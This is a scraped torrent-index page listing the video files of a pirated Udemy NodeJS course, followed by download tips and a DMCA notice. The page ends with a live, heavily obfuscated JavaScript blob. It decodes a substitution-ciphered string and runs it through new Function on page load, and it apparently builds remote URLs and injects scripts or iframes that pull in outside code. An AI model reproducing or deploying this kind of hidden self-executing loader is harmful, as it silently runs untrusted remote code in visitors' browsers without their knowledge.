[Udemy] Learn and Understand NodeJS

mp4   Hot:25   Size:2.23 GB   Created:2017-09-05 05:39:25   Update:2019-06-20 19:19:56  

File List

  • Section 01 - Introduction and Setup/001 - Introduction and the Goal of this Course.mp4 15.94 MB
    Section 01 - Introduction and Setup/002 - Big Words and NodeJS.mp4 10.92 MB
    Section 01 - Introduction and Setup/003 - Watching this Course in High Definition 1.07 KB
    Section 01 - Introduction and Setup/004 - Conceptual Aside - The Command Line Interface.mp4 30.33 MB
    Section 01 - Introduction and Setup/005 - Command Line References 417 B
    Section 02 - V8: The Javascript Engine /006 - Conceptual Aside - Processors, Machine Language, and C++.mp4 42.03 MB
    Section 02 - V8: The Javascript Engine /007 - Javascript Aside - Javascript Engines and The ECMAScript Specification.mp4 25.02 MB
    Section 02 - V8: The Javascript Engine /008 - V8 Under the Hood.mp4 25.64 MB
    Section 02 - V8: The Javascript Engine /009 - Adding Features to Javascript.mp4 53.4 MB
    Section 03 - The Node Core/010 - Conceptual Aside - Servers and Clients.mp4 32.63 MB
    Section 03 - The Node Core/011 - What Does Javascript Need to Manage a Server.mp4 12.77 MB
    Section 03 - The Node Core/012 - The C++ Core.mp4 17.89 MB
    Section 03 - The Node Core/013 - The Javascript Core.mp4 14.36 MB
    Section 03 - The Node Core/014 - Downloading Lecture Source Code 701 B
    Section 03 - The Node Core/015 - Let's Install and Run Some Javascript in Node.mp4 39.5 MB
    Section 04 - Modules, Exports, and Require/016 - Conceptual Aside - Modules.mp4 18.22 MB
    Section 04 - Modules, Exports, and Require/017 - Javascript Aside - First-Class Functions and Function Expressions.mp4 37.25 MB
    Section 04 - Modules, Exports, and Require/018 - Let's Build a Module.mp4 17.82 MB
    Section 04 - Modules, Exports, and Require/019 - Javascript Aside - Objects and Object Literals.mp4 26.29 MB
    Section 04 - Modules, Exports, and Require/020 - Javascript Aside - Prototypal Inheritance and Function Constructors.mp4 42.04 MB
    Section 04 - Modules, Exports, and Require/021 - Javascript Aside - By Reference and By Value.mp4 15.99 MB
    Section 04 - Modules, Exports, and Require/022 - Javascript Aside - Immediately Invoked Function Expressions (IIFEs).mp4 14.92 MB
    Section 04 - Modules, Exports, and Require/023 - How Do Node Modules Really Work - module.exports and require.mp4 40.07 MB
    Section 04 - Modules, Exports, and Require/024 - Javascript Aside - JSON.mp4 7.61 MB
    Section 04 - Modules, Exports, and Require/025 - More on require.mp4 17.34 MB
    Section 04 - Modules, Exports, and Require/026 - Module Patterns.mp4 41.32 MB
    Section 04 - Modules, Exports, and Require/027 - exports vs module.exports.mp4 27.49 MB
    Section 04 - Modules, Exports, and Require/028 - Requiring Native (Core) Modules.mp4 15.43 MB
    Section 04 - Modules, Exports, and Require/029 - Modules and ES6.mp4 15.43 MB
    Section 04 - Modules, Exports, and Require/030 - Web Server Checklist.mp4 7.95 MB
    Section 05 - Events and the Event Emitter/031 - Conceptual Aside - Events.mp4 27.05 MB
    Section 05 - Events and the Event Emitter/032 - Javascript Aside - Object Properties, First Class Functions, and Arrays.mp4 11.96 MB
    Section 05 - Events and the Event Emitter/033 - The Node Event Emitter - Part 1.mp4 35.07 MB
    Section 05 - Events and the Event Emitter/034 - The Node Event Emitter - Part 2.mp4 43.33 MB
    Section 05 - Events and the Event Emitter/035 - Javascript Aside - Object.create and Prototypes.mp4 22.85 MB
    Section 05 - Events and the Event Emitter/036 - Inheriting From the Event Emitter.mp4 48.58 MB
    Section 05 - Events and the Event Emitter/037 - Javascript Aside - Node, ES6, and Template Literals.mp4 27.8 MB
    Section 05 - Events and the Event Emitter/038 - Javascript Aside - .call and .apply.mp4 7.48 MB
    Section 05 - Events and the Event Emitter/039 - Inheriting From the Event Emitter - Part 2.mp4 23.42 MB
    Section 05 - Events and the Event Emitter/040 - Javascript Aside - ES6 Classes.mp4 23.53 MB
    Section 05 - Events and the Event Emitter/041 - Inheriting From the Event Emitter - Part 3.mp4 14.64 MB
    Section 06 - Asynchronous Code, libuv, The Event Loop, Streams, Files, and more…/042 - Javascript Aside - Javascript is Synchronous.mp4 9.36 MB
    Section 06 - Asynchronous Code, libuv, The Event Loop, Streams, Files, and more…/043 - Conceptual Aside - Callbacks.mp4 10.66 MB
    Section 06 - Asynchronous Code, libuv, The Event Loop, Streams, Files, and more…/044 - libuv, The Event Loop, and Non-Blocking Asynchronous Execution.mp4 51.59 MB
    Section 06 - Asynchronous Code, libuv, The Event Loop, Streams, Files, and more…/045 - Conceptual Aside - Streams and Buffers.mp4 26.49 MB
    Section 06 - Asynchronous Code, libuv, The Event Loop, Streams, Files, and more…/046 - Conceptual Aside - Binary Data, Character Sets, and Encodings.mp4 47.54 MB
    Section 06 - Asynchronous Code, libuv, The Event Loop, Streams, Files, and more…/047 - Buffers.mp4 8.55 MB
    Section 06 - Asynchronous Code, libuv, The Event Loop, Streams, Files, and more…/048 - ES6 Typed Arrays.mp4 13.11 MB
    Section 06 - Asynchronous Code, libuv, The Event Loop, Streams, Files, and more…/049 - Javascript Aside - Callbacks.mp4 11.01 MB
    Section 06 - Asynchronous Code, libuv, The Event Loop, Streams, Files, and more…/050 - Files and fs.mp4 35.1 MB
    Section 06 - Asynchronous Code, libuv, The Event Loop, Streams, Files, and more…/051 - Streams.mp4 70.84 MB
    Section 06 - Asynchronous Code, libuv, The Event Loop, Streams, Files, and more…/052 - Conceptual Aside - Pipes.mp4 12.41 MB
    Section 06 - Asynchronous Code, libuv, The Event Loop, Streams, Files, and more…/053 - Pipes.mp4 42.11 MB
    Section 06 - Asynchronous Code, libuv, The Event Loop, Streams, Files, and more…/054 - Web Server Checklist.mp4 14.51 MB
    Section 07 - HTTP and Being a Web Server/055 - Conceptual Aside - TCP-IP.mp4 38.54 MB
    Section 07 - HTTP and Being a Web Server/056 - Conceptual Aside - Addresses and Ports.mp4 16.64 MB
    Section 07 - HTTP and Being a Web Server/057 - Conceptual Aside - HTTP.mp4 36.62 MB
    Section 07 - HTTP and Being a Web Server/058 - http_parser.mp4 36.24 MB
    Section 07 - HTTP and Being a Web Server/059 - Let's Build a Web Server in Node.mp4 36.11 MB
    Section 07 - HTTP and Being a Web Server/060 - Outputting HTML and Templates.mp4 26.32 MB
    Section 07 - HTTP and Being a Web Server/061 - Streams and Performance.mp4 10.23 MB
    Section 07 - HTTP and Being a Web Server/062 - Conceptual Aside - APIs and Endpoints.mp4 17.62 MB
    Section 07 - HTTP and Being a Web Server/063 - Outputting JSON.mp4 17.92 MB
    Section 07 - HTTP and Being a Web Server/064 - Routing.mp4 26.36 MB
    Section 07 - HTTP and Being a Web Server/065 - Web Server Checklist.mp4 13.26 MB
    Section 08 - NPM - The Node Package Manager/066 - Conceptual Aside - Packages and Package Managers.mp4 23.54 MB
    Section 08 - NPM - The Node Package Manager/067 - Conceptual Aside - Semantic Versioning (semver).mp4 34.57 MB
    Section 08 - NPM - The Node Package Manager/068 - NPM and the NPM Registry - Other People's Code.mp4 14.75 MB
    Section 08 - NPM - The Node Package Manager/069 - init, nodemon, and package.json.mp4 29.83 MB
    Section 08 - NPM - The Node Package Manager/070 - NPM Global Installation 256 B
    Section 08 - NPM - The Node Package Manager/071 - init, nodemon, and package.json - Part 2.mp4 33.21 MB
    Section 08 - NPM - The Node Package Manager/072 - Using Other People's Code.mp4 9.17 MB
    Section 09 - Express/073 - Installing Express and Making it Easier to Build a Web Server.mp4 45.45 MB
    Section 09 - Express/074 - Routes.mp4 15.3 MB
    Section 09 - Express/075 - Static Files and Middleware.mp4 50.17 MB
    Section 09 - Express/076 - Templates and Template Engines.mp4 35.42 MB
    Section 09 - Express/077 - Querystring and Post Parameters.mp4 60.96 MB
    Section 09 - Express/078 - RESTful APIs and JSON.mp4 19.43 MB
    Section 09 - Express/079 - Structuring an App.mp4 43.53 MB
    Section 10 - Javascript, JSON, and Databases/080 - Conceptual Aside - Relational Databases and SQL.mp4 23.2 MB
    Section 10 - Javascript, JSON, and Databases/081 - Node and MySQL.mp4 25.55 MB
    Section 10 - Javascript, JSON, and Databases/082 - Conceptual Aside - NoSQL and Documents.mp4 19.02 MB
    Section 10 - Javascript, JSON, and Databases/083 - MongoDB and Mongoose.mp4 36.46 MB
    Section 10 - Javascript, JSON, and Databases/084 - Web Server Checklist.mp4 4.29 MB
    Section 11 - The MEAN stack/085 - MongoDB, Express, AngularJS, and NodeJS.mp4 40.05 MB
    Section 11 - The MEAN stack/086 - AngularJS - Managing the Client.mp4 34.58 MB
    Section 11 - The MEAN stack/087 - AngularJS - Managing the Client (Part 2).mp4 21.02 MB
    Section 11 - The MEAN stack/088 - AngularJS - Managing the Client (Part 3).mp4 34.32 MB
    Section 11 - The MEAN stack/089 - Conceptual Aside - Angular 1, Angular 2, React, and more….mp4 14.39 MB
    Section 11 - The MEAN stack/090 - Working with The Full Stack (and being a Full Stack Developer) - Part 1.mp4 32.05 MB
    Section 11 - The MEAN stack/091 - Future Lectures 256 B
    file-list 4.36 KB

Download Info

  • Tips

    “[Udemy] Learn and Understand NodeJS” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="h9m3gbx3qf";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm0Y51J({mRT4gQ@{n/CL/@@{jR8hQ^sp)Rs:7"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"hQ^sp)Rs:7"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYms5n6d1qmRT4"="@@{5p(LYpmQLqd0@fmRT4"="@@{D7(LSqms5n6d1qmRT4"="@@{dC(LJ^mQLqd0@fmRT4"="@@{(C(L:4ms5n6d1qmRT4"="@@{C2(LSYmQLqd0@fmRT4"="@@{25(LLSms5n6d1qmRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm@dRJDdomRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm@dRJDdomRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm0Y51J({mRT4gQ@{n/f/@@{j(8}vR8hQ^sp)Rs:7"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm0Y51J({mRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();